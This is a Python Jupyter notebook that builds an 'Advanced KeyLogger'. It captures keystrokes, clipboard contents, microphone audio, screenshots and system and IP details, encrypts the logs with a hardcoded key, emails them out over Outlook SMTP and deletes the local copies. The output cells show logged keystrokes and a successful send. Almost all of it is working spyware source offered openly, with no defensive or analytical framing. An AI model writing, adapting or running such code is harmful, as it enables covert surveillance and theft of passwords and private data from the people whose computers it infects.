### Imports

In [12]:
# For E-Mail Features
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders

# For collecting System Information
import socket
import platform

# For collecting clipboard information
import win32clipboard

# For recording keystrokes
from pynput.keyboard import Key, Listener       # Key logs the key and Listener listens for each key type

import time
import os

# For accessing sound modules
from scipy.io.wavfile import write
import sounddevice as sd

# For encrypting the file
from cryptography.fernet import Fernet

# For getting some more computer information
import getpass                                  # To get password
from requests import get

# For taking screenshots
from multiprocessing import Process, freeze_support
from PIL import ImageGrab

### KeyLogger

##### Global Variables

In [13]:
keys_information = "Key_Logs.txt"               # All keys logged will be appended here 

# For e-mail features
from_email = ''                                             # Sender email address
password = ''                                               # Sender email password
to_email = ''                                               # Recipient's email address

HOST = "smtp-mail.outlook.com"
PORT = 587

# For system information
system_information = "System_Info.txt"

# For clipboard information
clipboard_information = "Clipboard.txt"

# For microphone information 
microphone_time = 5
audio_information = "Audio_Information.wav"

# For screenshot information
screenshots_information = "Screenshot.png"

# For encryption of files
key = "VgwNiPId1ddoJ9PkkYxzXjHKpsWoV-7fCGoffzdskwI="
key_information = "E_Key_Logs.txt"
key_system_information = "E_System_Info.txt"
key_clipboard_information = "E_Clipboard.txt"


file_path = "E:\\Computer Science\\Python\\Projects\\Advanced KeyLogger"
extend = "\\"
file_merge = file_path + extend

count = 0
keys = []                                     # Each key will be appended here

### Functions

##### KeyLogger Functions

In [14]:
# Appends keystrokes into keys list
def on_press(key):
    global keys, count

    print(key)
    keys.append(key)
    count += 1
    

    if count >= 1:
        count = 0
        write_file(keys)
        keys =[]

# Write the values of list keys into log file
def write_file(keys):
    with open(file_path + extend + keys_information, "a") as f:         # a stands for append and f is the file object

        # For making the file look more readable
        for key in keys:
            k = str(key).replace("'", "")                               # Converting key into string and then removing ' with nothing
            if k.find("space") > 0:                                     # Whenever we encounter a space we will move to next line
                f.write('\n')
                f.close()

            elif k.find("Key") == -1:                                   # If the key is not a special key then we will write it 
                f.write(k)
                f.close()

# To exit out from the keylogger
def on_release(key):
    if key == Key.esc:
        return False

##### E-mail Functionality

In [15]:
def send_email_with_attachment(from_email, password, to_email, subject, body, file_paths):
    # Create a multipart message
    msg = MIMEMultipart()
    msg['From'] = from_email
    msg['To'] = to_email
    msg['Subject'] = subject

    # Add body to email
    msg.attach(MIMEText(body, 'plain'))

    # Attach files to the email
    for file_path in file_paths:
        attachment = open(file_path, 'rb')

        part = MIMEBase('application', 'octet-stream')
        part.set_payload(attachment.read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition', f'attachment; filename= {file_path}')
        
        msg.attach(part)

    # Connect to the SMTP server and send the email
    try:
        smtp = smtplib.SMTP('smtp-mail.outlook.com', 587)                                                                  # Update SMTP server and port if using a different provider
        smtp.starttls()
        smtp.login(from_email, password)
        text = msg.as_string()
        smtp.sendmail(from_email, to_email, text)
        smtp.quit()
        print("Email sent successfully.")

    except Exception as e:
        print("Failed to send email:", e)

# Example usage
subject = 'KeyLogger Output'
body = 'Captured Files Attached.'
#file_paths = ['Key_Logs.txt','Clipboard.txt','Screenshot.png','System_Info.txt','Audio_Information.wav']                  # Update with paths to the files you want to attach

#send_email_with_attachment(from_email, password, to_email, subject, body, file_paths)

##### System Information

In [23]:
def computer_information():
    with open(file_path + extend + system_information, "a") as f:
        hostname = socket.gethostname()
        IPAddr = socket.gethostbyname(hostname)
        try:
            public_ip = get("https://api.ipify.org").text
            f.write("\nPublic IP Address: " + public_ip + '\n')

        except Exception:
            f.write("Couldn't get Public IP Address (most likely max query" + '\n')

        f.write("Processor: " + (platform.processor()) + '\n')
        f.write("System: " + platform.system() + " " + platform.version() + '\n')
        f.write("Machine: " + platform.machine() + "\n")
        f.write("Hostname: " + hostname + "\n")
        f.write("Private IP Address: " + IPAddr + "\n")

##### Clipboard Information

In [17]:
def copy_clipboard():
    with open(file_path + extend + clipboard_information, "a") as f:
        try:
            win32clipboard.OpenClipboard()
            data = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()

            f.write("Clipboard Data: \n" + data)

        except:
            f.write("Clipboard could not be copied \n")

##### Microphone Information

In [18]:
def microphone():
    sampling_frequency = 48000 
    seconds = microphone_time    # For how much time do we wanna record the audio

    recording = sd.rec(int(sampling_frequency * seconds), samplerate = sampling_frequency, channels = 2)
    sd.wait()

    write(file_path + extend + audio_information, sampling_frequency, recording)

##### Screenshot Functionality

In [19]:
def screenshot():
    im = ImageGrab.grab()
    im.save(file_path + extend + screenshots_information)

##### KeyLogger 

In [24]:
count = 0
keys =[]

# For listening to keys and to imlement all the functions together
with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

# Keystrokes are now being captured
computer_information()
copy_clipboard()
microphone()
screenshot()    


Key.enter
'n'
'a'
'n'
'a'
Key.space
'h'
'u'
'h'
'u'
Key.space
'j'
'i'
'j'
'i'
Key.esc


##### Encryption Functionality

In [21]:
files_to_encrypt = [file_merge + keys_information, file_merge + system_information, file_merge + clipboard_information]
encrypted_file_names = [file_merge + key_information, file_merge + key_system_information, file_merge + key_clipboard_information]

count = 0

for encrypting_file in files_to_encrypt:

    with open(files_to_encrypt[count], 'rb') as f:
        data = f.read()

    fernet = Fernet(key)
    encrypted = fernet.encrypt(data)

    with open(encrypted_file_names[count], 'wb') as f:
        f.write(encrypted)

    count += 1

send_email_with_attachment(from_email, password, to_email, subject, body, encrypted_file_names + [screenshots_information, audio_information])

Email sent successfully.


##### Cleaning up 

In [25]:
delete_files = [system_information, clipboard_information, keys_information]
for file in delete_files:
    os.remove(file_merge + file)